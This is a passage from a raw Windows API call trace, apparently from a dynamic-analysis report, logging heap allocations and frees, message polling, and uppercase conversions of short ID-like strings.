(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0260.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0260.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.061] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.062] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0260.063] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0260.063] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.063] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.066] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0260.066] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.067] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.067] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.069] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.069] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0260.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0260.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0260.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.070] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.070] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.071] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0260.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: 